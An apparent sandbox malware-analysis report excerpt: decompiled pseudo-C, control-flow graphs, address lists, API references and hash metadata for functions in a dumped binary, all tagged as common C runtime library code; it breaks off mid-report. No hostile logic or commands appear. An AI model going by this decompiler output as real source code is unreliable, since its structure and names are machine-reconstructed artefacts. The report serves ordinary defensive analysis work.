                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 910155933-0
                                                                                                                                                                          • Opcode ID: c7957f6f4037469caa6722a514c3a708bd86214c3bebee3412532b3592406ee9
                                                                                                                                                                          • Instruction ID: 35c86cba410e5f5c14928be48e867bc535595b66d2efcc97446814fdba3a1c64
                                                                                                                                                                          • Opcode Fuzzy Hash: c7957f6f4037469caa6722a514c3a708bd86214c3bebee3412532b3592406ee9
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F510275A0020DABDF11DFA4EC45BEE7FB8AF8A321F140145E551AB1D1DA38D942C764
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FE28E Relevance: 4.6, APIs: 3, Instructions: 141COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 610 9fe28e-9fe2a4 call 9fe3ed 612 9fe2a9-9fe2af 610->612 613 9fe2f4 612->613 614 9fe2b1-9fe2e0 call a041d0 call a06ce9 612->614 616 9fe2f6-9fe2fa 613->616 620 9fe2fb-9fe30c call a04e1f 614->620 621 9fe2e2-9fe2e5 614->621 620->613 627 9fe30e-9fe328 call a06ce9 620->627 623 9fe2eb-9fe2ee 621->623 624 9fe3e2-9fe3ec call 9fcbfc 621->624 623->613 623->624 631 9fe32a-9fe32d 627->631 632 9fe345-9fe357 627->632 633 9fe333-9fe336 631->633 634 9fe3e0 631->634 635 9fe37f-9fe38d 632->635 636 9fe359-9fe35f 632->636 633->634 639 9fe33c-9fe343 call a0447f 633->639 634->624 637 9fe3bf-9fe3db 635->637 638 9fe38f-9fe39b 635->638 636->635 640 9fe361-9fe37c call a0447f 636->640 637->616 638->637 641 9fe39d-9fe3a2 638->641 639->613 640->635 641->637 644 9fe3a4-9fe3ba call a0447f 641->644 644->637
                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                          			E009FE28E(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v44;
				char _v80;
				char _v84;
				void* _v93;
				char _v100;
				char _v104;
				char* _v108;
				char _v112;
				void* __ebp;
				intOrPtr* _t70;
				signed int _t71;
				char _t72;
				void* _t75;
				signed int _t80;
				signed int _t84;
				signed int _t95;
				signed int _t106;
				signed int _t110;
				char _t116;
				void* _t120;
				void* _t121;
				signed int _t125;
				signed int _t126;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t143;
				void* _t145;
				char _t155;
				intOrPtr* _t157;
				intOrPtr _t159;
				void* _t160;
				signed int _t163;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t153 = __edx;
				_push(__ebx);
				_push(__esi);
				_t163 = __ecx;
				_push(__edi);
				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
				_t70 =  *((intOrPtr*)(__ecx));
				_push( *_t70); // executed
				L21(); // executed
				_t157 = _t70;
				_pop(_t129);
				if(_t157 == 0) {
					L4:
					_t71 = 0;
					goto L5;
				} else {
					_t72 = E00A041D0(_t129, __edx);
					_v12 = _t72;
					_t125 = 0;
					_v20 =  *((intOrPtr*)(_t72 + 0x4c));
					_t131 =  *(_t72 + 0x48);
					_v16 = _t131;
					_v8 = 0;
					_t75 = E00A06CE9(0, _t131, __edx,  &_v8, 0, 0, _t157, 0,  &_v20);
					_t170 = _t169 + 0x18;
					if(_t75 == 0) {
						_t126 = E00A04E1F(_v8 + 4);
						__eflags = _t126;
						if(_t126 == 0) {
							goto L4;
						} else {
							_t131 =  &_v20;
							_t13 = _t126 + 4; // 0x4
							_t80 = E00A06CE9(_t126, _t131, __edx, 0, _t13, _v8, _t157, 0xffffffff, _t131);
							_t170 = _t170 + 0x18;
							__eflags = _t80;
							if(_t80 == 0) {
								_t133 = _t131 | 0xffffffff;
								_t159 = _v20;
								_t16 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xccccc3c9
								__eflags =  *(_t159 + _t16 + 0x24);
								if(__eflags != 0) {
									asm("lock xadd [edx], eax");
									if(__eflags == 0) {
										_t19 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xccccc3c9
										E00A0447F( *((intOrPtr*)(_t159 + _t19 + 0x24)));
										_pop(_t143);
										 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) =  *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) & 0x00000000;
										_t133 = _t143 | 0xffffffff;
										__eflags = _t133;
									}
								}
								_t155 = _v12;
								_t84 =  *0xa44e28; // 0xfffffffe
								__eflags =  *(_t155 + 0x350) & _t84;
								if(( *(_t155 + 0x350) & _t84) == 0) {
									_t32 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xccccc3c9
									__eflags =  *(_t159 + _t32 + 0x24);
									if( *(_t159 + _t32 + 0x24) != 0) {
										asm("lock xadd [eax], ecx");
										__eflags = _t133 == 1;
										if(_t133 == 1) {
											_t35 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xccccc3c9
											E00A0447F( *((intOrPtr*)(_t159 + _t35 + 0x24)));
											_t95 =  *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163));
											_t37 = _t159 + 0x24 + _t95 * 8;
											 *_t37 =  *(_t159 + 0x24 + _t95 * 8) & 0x00000000;
											__eflags =  *_t37;
										}
									}
								}
								_t43 = _t159 + 0xc; // 0x4c488b00
								_t44 = _t126 + 4; // 0x4
								_t71 = _t44;
								 *_t126 =  *_t43;
								 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) = _t126;
								 *((intOrPtr*)(_t159 + 0x1c + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8)) = _t71;
								L5:
								return _t71;
							} else {
								__eflags = _t80 - 0x16;
								if(_t80 == 0x16) {
									L19:
									_t125 = 0;
									__eflags = 0;
									goto L20;
								} else {
									__eflags = _t80 - 0x22;
									if(_t80 == 0x22) {
										goto L19;
									} else {
										E00A0447F(_t126);
										goto L4;
									}
								}
							}
						}
					} else {
						if(_t75 == 0x16 || _t75 == 0x22) {
							L20:
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							E009FCBFC();
							asm("int3");
							_t167 = _t170;
							_push(_t131);
							__eflags = _v44;
							if(_v44 != 0) {
								_push(_t163);
								_push(_t157);
								_t160 = 0;
								_t106 = E00A06A2A( &_v12, 0, 0, _a4, 0x7fffffff);
								_t171 = _t170 + 0x14;
								__eflags = _t106;
								if(_t106 == 0) {
									L26:
									_t163 = E00A04422(_v12, 2);
									_pop(_t145);
									__eflags = _t163;
									if(_t163 == 0) {
										L32:
										E00A0447F(_t163);
										return _t160;
									} else {
										_t110 = E00A06A2A(_t160, _t163, _v12, _a4, 0xffffffff);
										_t171 = _t171 + 0x14;
										__eflags = _t110;
										if(_t110 == 0) {
											_t160 = E00A022B4(_t125, _t145, _t153, _t160, _t163, _v0, _t163);
											goto L32;
										} else {
											__eflags = _t110 - 0x16;
											if(_t110 == 0x16) {
												goto L33;
											} else {
												__eflags = _t110 - 0x22;
												if(_t110 == 0x22) {
													goto L33;
												} else {
													goto L32;
												}
											}
										}
									}
								} else {
									__eflags = _t106 - 0x16;
									if(_t106 == 0x16) {
										L33:
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										E009FCBFC();
										asm("int3");
										_push(_t167);
										E00A0670F();
										_v112 =  &_v84;
										_v108 =  &_v80;
										_t116 = 4;
										_v100 = _t116;
										_v104 = _t116;
										_push( &_v100);
										_push( &_v112);
										_push( &_v104); // executed
										_t120 = E009FE233(_t125, _t160, _t163, __eflags); // executed
										return _t120;
									} else {
										__eflags = _t106 - 0x22;
										if(_t106 == 0x22) {
											goto L33;
										} else {
											goto L26;
										}
									}
								}
							} else {
								_t121 = E00A022B4(_t125, _t131, _t153, _t157, _t163, _v0, 0); // executed
								return _t121;
							}
						} else {
							goto L4;
						}
					}
				}
			}













































                                                                                                                                                                          0x009fe28e
                                                                                                                                                                          0x009fe296
                                                                                                                                                                          0x009fe297
                                                                                                                                                                          0x009fe298
                                                                                                                                                                          0x009fe29a
                                                                                                                                                                          0x009fe29e
                                                                                                                                                                          0x009fe2a0
                                                                                                                                                                          0x009fe2a2
                                                                                                                                                                          0x009fe2a4
                                                                                                                                                                          0x009fe2a9
                                                                                                                                                                          0x009fe2ac
                                                                                                                                                                          0x009fe2af
                                                                                                                                                                          0x009fe2f4
                                                                                                                                                                          0x009fe2f4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe2b1
                                                                                                                                                                          0x009fe2b1
                                                                                                                                                                          0x009fe2b6
                                                                                                                                                                          0x009fe2b9
                                                                                                                                                                          0x009fe2be
                                                                                                                                                                          0x009fe2c1
                                                                                                                                                                          0x009fe2ce
                                                                                                                                                                          0x009fe2d3
                                                                                                                                                                          0x009fe2d6
                                                                                                                                                                          0x009fe2db
                                                                                                                                                                          0x009fe2e0
                                                                                                                                                                          0x009fe307
                                                                                                                                                                          0x009fe30a
                                                                                                                                                                          0x009fe30c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe30e
                                                                                                                                                                          0x009fe30e
                                                                                                                                                                          0x009fe318
                                                                                                                                                                          0x009fe31e
                                                                                                                                                                          0x009fe323
                                                                                                                                                                          0x009fe326
                                                                                                                                                                          0x009fe328
                                                                                                                                                                          0x009fe347
                                                                                                                                                                          0x009fe34a
                                                                                                                                                                          0x009fe351
                                                                                                                                                                          0x009fe355
                                                                                                                                                                          0x009fe357
                                                                                                                                                                          0x009fe35b
                                                                                                                                                                          0x009fe35f
                                                                                                                                                                          0x009fe367
                                                                                                                                                                          0x009fe36b
                                                                                                                                                                          0x009fe372
                                                                                                                                                                          0x009fe377
                                                                                                                                                                          0x009fe37c
                                                                                                                                                                          0x009fe37c
                                                                                                                                                                          0x009fe37c
                                                                                                                                                                          0x009fe35f
                                                                                                                                                                          0x009fe37f
                                                                                                                                                                          0x009fe382
                                                                                                                                                                          0x009fe387
                                                                                                                                                                          0x009fe38d
                                                                                                                                                                          0x009fe395
                                                                                                                                                                          0x009fe399
                                                                                                                                                                          0x009fe39b
                                                                                                                                                                          0x009fe39d
                                                                                                                                                                          0x009fe3a1
                                                                                                                                                                          0x009fe3a2
                                                                                                                                                                          0x009fe3aa
                                                                                                                                                                          0x009fe3ae
                                                                                                                                                                          0x009fe3b8
                                                                                                                                                                          0x009fe3ba
                                                                                                                                                                          0x009fe3ba
                                                                                                                                                                          0x009fe3ba
                                                                                                                                                                          0x009fe3ba
                                                                                                                                                                          0x009fe3a2
                                                                                                                                                                          0x009fe39b
                                                                                                                                                                          0x009fe3bf
                                                                                                                                                                          0x009fe3c2
                                                                                                                                                                          0x009fe3c2
                                                                                                                                                                          0x009fe3c5
                                                                                                                                                                          0x009fe3cd
                                                                                                                                                                          0x009fe3d7
                                                                                                                                                                          0x009fe2f6
                                                                                                                                                                          0x009fe2fa
                                                                                                                                                                          0x009fe32a
                                                                                                                                                                          0x009fe32a
                                                                                                                                                                          0x009fe32d
                                                                                                                                                                          0x009fe3e0
                                                                                                                                                                          0x009fe3e0
                                                                                                                                                                          0x009fe3e0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe333
                                                                                                                                                                          0x009fe333
                                                                                                                                                                          0x009fe336
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe33c
                                                                                                                                                                          0x009fe33d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe342
                                                                                                                                                                          0x009fe336
                                                                                                                                                                          0x009fe32d
                                                                                                                                                                          0x009fe328
                                                                                                                                                                          0x009fe2e2
                                                                                                                                                                          0x009fe2e5
                                                                                                                                                                          0x009fe3e2
                                                                                                                                                                          0x009fe3e2
                                                                                                                                                                          0x009fe3e3
                                                                                                                                                                          0x009fe3e4
                                                                                                                                                                          0x009fe3e5
                                                                                                                                                                          0x009fe3e6
                                                                                                                                                                          0x009fe3e7
                                                                                                                                                                          0x009fe3ec
                                                                                                                                                                          0x009fe3f0
                                                                                                                                                                          0x009fe3f2
                                                                                                                                                                          0x009fe3f3
                                                                                                                                                                          0x009fe3f7
                                                                                                                                                                          0x009fe407
                                                                                                                                                                          0x009fe408
                                                                                                                                                                          0x009fe411
                                                                                                                                                                          0x009fe419
                                                                                                                                                                          0x009fe41e
                                                                                                                                                                          0x009fe421
                                                                                                                                                                          0x009fe423
                                                                                                                                                                          0x009fe42f
                                                                                                                                                                          0x009fe439
                                                                                                                                                                          0x009fe43c
                                                                                                                                                                          0x009fe43d
                                                                                                                                                                          0x009fe43f
                                                                                                                                                                          0x009fe470
                                                                                                                                                                          0x009fe471
                                                                                                                                                                          0x009fe47c
                                                                                                                                                                          0x009fe441
                                                                                                                                                                          0x009fe44b
                                                                                                                                                                          0x009fe450
                                                                                                                                                                          0x009fe453
                                                                                                                                                                          0x009fe455
                                                                                                                                                                          0x009fe46e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe457
                                                                                                                                                                          0x009fe457
                                                                                                                                                                          0x009fe45a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe45c
                                                                                                                                                                          0x009fe45c
                                                                                                                                                                          0x009fe45f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe461
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe461
                                                                                                                                                                          0x009fe45f
                                                                                                                                                                          0x009fe45a
                                                                                                                                                                          0x009fe455
                                                                                                                                                                          0x009fe425
                                                                                                                                                                          0x009fe425
                                                                                                                                                                          0x009fe428
                                                                                                                                                                          0x009fe47d
                                                                                                                                                                          0x009fe47d
                                                                                                                                                                          0x009fe47e
                                                                                                                                                                          0x009fe47f
                                                                                                                                                                          0x009fe480
                                                                                                                                                                          0x009fe481
                                                                                                                                                                          0x009fe482
                                                                                                                                                                          0x009fe487
                                                                                                                                                                          0x009fe48a
                                                                                                                                                                          0x009fe490
                                                                                                                                                                          0x009fe498
                                                                                                                                                                          0x009fe4a3
                                                                                                                                                                          0x009fe4a6
                                                                                                                                                                          0x009fe4a7
                                                                                                                                                                          0x009fe4aa
                                                                                                                                                                          0x009fe4b0
                                                                                                                                                                          0x009fe4b4
                                                                                                                                                                          0x009fe4b8
                                                                                                                                                                          0x009fe4b9
                                                                                                                                                                          0x009fe4bf
                                                                                                                                                                          0x009fe42a
                                                                                                                                                                          0x009fe42a
                                                                                                                                                                          0x009fe42d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe42d
                                                                                                                                                                          0x009fe428
                                                                                                                                                                          0x009fe3f9
                                                                                                                                                                          0x009fe3fe
                                                                                                                                                                          0x009fe406
                                                                                                                                                                          0x009fe406
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe2e5
                                                                                                                                                                          0x009fe2e0

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A041D0: GetLastError.KERNEL32(?,00000000,?,009FD25E,00000000,00000000,?,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A041D5
                                                                                                                                                                            • Part of subcall function 00A041D0: SetLastError.KERNEL32(00000000,00000002,000000FF,?,00A06982,00000000,00000000,?,00000000,?), ref: 00A04273
                                                                                                                                                                          • _free.LIBCMT ref: 009FE33D
                                                                                                                                                                          • _free.LIBCMT ref: 009FE36B
                                                                                                                                                                          • _free.LIBCMT ref: 009FE3AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3291180501-0
                                                                                                                                                                          • Opcode ID: 7eb4b2c53c111885619dcf2ea76939c6806cdbedc02cebdaeed0435524e31ba6
                                                                                                                                                                          • Instruction ID: 37d8e6f819e021aca8decdd77e7daa54bb9f132676b16383da0c097d9292c07d
                                                                                                                                                                          • Opcode Fuzzy Hash: 7eb4b2c53c111885619dcf2ea76939c6806cdbedc02cebdaeed0435524e31ba6
                                                                                                                                                                          • Instruction Fuzzy Hash: 92416871600109AFDB24DFACD885AB9B3E9FF49314B240669FA55C73A1EB71EC109B90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FE3ED Relevance: 4.6, APIs: 3, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 649 9fe3ed-9fe3f7 650 9fe3f9-9fe3fe call a022b4 649->650 651 9fe407-9fe423 call a06a2a 649->651 654 9fe403-9fe406 650->654 656 9fe42f-9fe43f call a04422 651->656 657 9fe425-9fe428 651->657 664 9fe441-9fe455 call a06a2a 656->664 665 9fe470-9fe47c call a0447f 656->665 658 9fe47d-9fe4b9 call 9fcbfc call a0670f call 9fe233 657->658 659 9fe42a-9fe42d 657->659 678 9fe4be-9fe4bf 658->678 659->656 659->658 673 9fe457-9fe45a 664->673 674 9fe463-9fe46e call a022b4 664->674 673->658 676 9fe45c-9fe45f 673->676 674->665 676->658 679 9fe461 676->679 679->665
                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                          			E009FE3ED(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v28;
				char _v32;
				void* _v41;
				char _v48;
				char _v52;
				char* _v56;
				char _v60;
				void* __ebp;
				void* _t20;
				void* _t24;
				char _t30;
				void* _t34;
				void* _t35;
				void* _t39;
				void* _t46;
				void* _t48;
				void* _t54;
				void* _t55;

				_t50 = __esi;
				_t36 = __ebx;
				_push(__ecx);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t48 = 0;
					_t20 = E00A06A2A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t55 = _t54 + 0x14;
					__eflags = _t20;
					if(_t20 == 0) {
						L5:
						_t50 = E00A04422(_v8, 2);
						_pop(_t39);
						__eflags = _t50;
						if(_t50 == 0) {
							L11:
							E00A0447F(_t50);
							return _t48;
						} else {
							_t24 = E00A06A2A(_t48, _t50, _v8, _a8, 0xffffffff);
							_t55 = _t55 + 0x14;
							__eflags = _t24;
							if(_t24 == 0) {
								_t48 = E00A022B4(_t36, _t39, _t46, _t48, _t50, _a4, _t50);
								goto L11;
							} else {
								__eflags = _t24 - 0x16;
								if(_t24 == 0x16) {
									goto L12;
								} else {
									__eflags = _t24 - 0x22;
									if(_t24 == 0x22) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						__eflags = _t20 - 0x16;
						if(_t20 == 0x16) {
							L12:
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							E009FCBFC();
							asm("int3");
							E00A0670F();
							_v60 =  &_v32;
							_v56 =  &_v28;
							_t30 = 4;
							_v48 = _t30;
							_v52 = _t30;
							_push( &_v48);
							_push( &_v60);
							_push( &_v52); // executed
							_t34 = E009FE233(_t36, _t48, _t50, __eflags); // executed
							return _t34;
						} else {
							__eflags = _t20 - 0x22;
							if(_t20 == 0x22) {
								goto L12;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t35 = E00A022B4(__ebx, __ecx, _t46, __edi, __esi, _a4, 0); // executed
					return _t35;
				}
			}






















                                                                                                                                                                          0x009fe3ed
                                                                                                                                                                          0x009fe3ed
                                                                                                                                                                          0x009fe3f2
                                                                                                                                                                          0x009fe3f7
                                                                                                                                                                          0x009fe407
                                                                                                                                                                          0x009fe408
                                                                                                                                                                          0x009fe411
                                                                                                                                                                          0x009fe419
                                                                                                                                                                          0x009fe41e
                                                                                                                                                                          0x009fe421
                                                                                                                                                                          0x009fe423
                                                                                                                                                                          0x009fe42f
                                                                                                                                                                          0x009fe439
                                                                                                                                                                          0x009fe43c
                                                                                                                                                                          0x009fe43d
                                                                                                                                                                          0x009fe43f
                                                                                                                                                                          0x009fe470
                                                                                                                                                                          0x009fe471
                                                                                                                                                                          0x009fe47c
                                                                                                                                                                          0x009fe441
                                                                                                                                                                          0x009fe44b
                                                                                                                                                                          0x009fe450
                                                                                                                                                                          0x009fe453
                                                                                                                                                                          0x009fe455
                                                                                                                                                                          0x009fe46e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe457
                                                                                                                                                                          0x009fe457
                                                                                                                                                                          0x009fe45a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe45c
                                                                                                                                                                          0x009fe45c
                                                                                                                                                                          0x009fe45f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe461
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe461
                                                                                                                                                                          0x009fe45f
                                                                                                                                                                          0x009fe45a
                                                                                                                                                                          0x009fe455
                                                                                                                                                                          0x009fe425
                                                                                                                                                                          0x009fe425
                                                                                                                                                                          0x009fe428
                                                                                                                                                                          0x009fe47d
                                                                                                                                                                          0x009fe47d
                                                                                                                                                                          0x009fe47e
                                                                                                                                                                          0x009fe47f
                                                                                                                                                                          0x009fe480
                                                                                                                                                                          0x009fe481
                                                                                                                                                                          0x009fe482
                                                                                                                                                                          0x009fe487
                                                                                                                                                                          0x009fe490
                                                                                                                                                                          0x009fe498
                                                                                                                                                                          0x009fe4a3
                                                                                                                                                                          0x009fe4a6
                                                                                                                                                                          0x009fe4a7
                                                                                                                                                                          0x009fe4aa
                                                                                                                                                                          0x009fe4b0
                                                                                                                                                                          0x009fe4b4
                                                                                                                                                                          0x009fe4b8
                                                                                                                                                                          0x009fe4b9
                                                                                                                                                                          0x009fe4bf
                                                                                                                                                                          0x009fe42a
                                                                                                                                                                          0x009fe42a
                                                                                                                                                                          0x009fe42d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe42d
                                                                                                                                                                          0x009fe428
                                                                                                                                                                          0x009fe3f9
                                                                                                                                                                          0x009fe3fe
                                                                                                                                                                          0x009fe406
                                                                                                                                                                          0x009fe406

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __cftoe$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1303422935-0
                                                                                                                                                                          • Opcode ID: 4b934fa67902b44049483c3ae22a6ca119b5441a6c6a3cfe6d1bdc82b2e87f78
                                                                                                                                                                          • Instruction ID: 8cd8a3c278bcec2e26a69d7c2576aecd4c4723f8b361bbdb24d3ff3a0e99de04
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b934fa67902b44049483c3ae22a6ca119b5441a6c6a3cfe6d1bdc82b2e87f78
                                                                                                                                                                          • Instruction Fuzzy Hash: F821DE7280010C7ACF25A6959C45EEF3BADDF85324F104116FA15E51E1EA30DA40C795
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A064F7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 681 a064f7-a0651a call a062a7 684 a06531-a06533 TlsSetValue 681->684 685 a0651c-a0652e FlsSetValue 681->685
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value
                                                                                                                                                                          • String ID: FlsSetValue
                                                                                                                                                                          • API String ID: 3702945584-3750699315
                                                                                                                                                                          • Opcode ID: 822c658a70e428f482b2177ca6113ffcad0e9dfb1352b87684f33b12cfc1ed68
                                                                                                                                                                          • Instruction ID: 828cd08283e614fe03fb57490449f78fd1e9f127593bffd9b35e55dadac65193
                                                                                                                                                                          • Opcode Fuzzy Hash: 822c658a70e428f482b2177ca6113ffcad0e9dfb1352b87684f33b12cfc1ed68
                                                                                                                                                                          • Instruction Fuzzy Hash: 7DE0863268012873C62066D5BC05EEA7E46EB54BB2F058162F90855190D9765861C6D4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0C245 Relevance: 3.2, APIs: 2, Instructions: 166COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
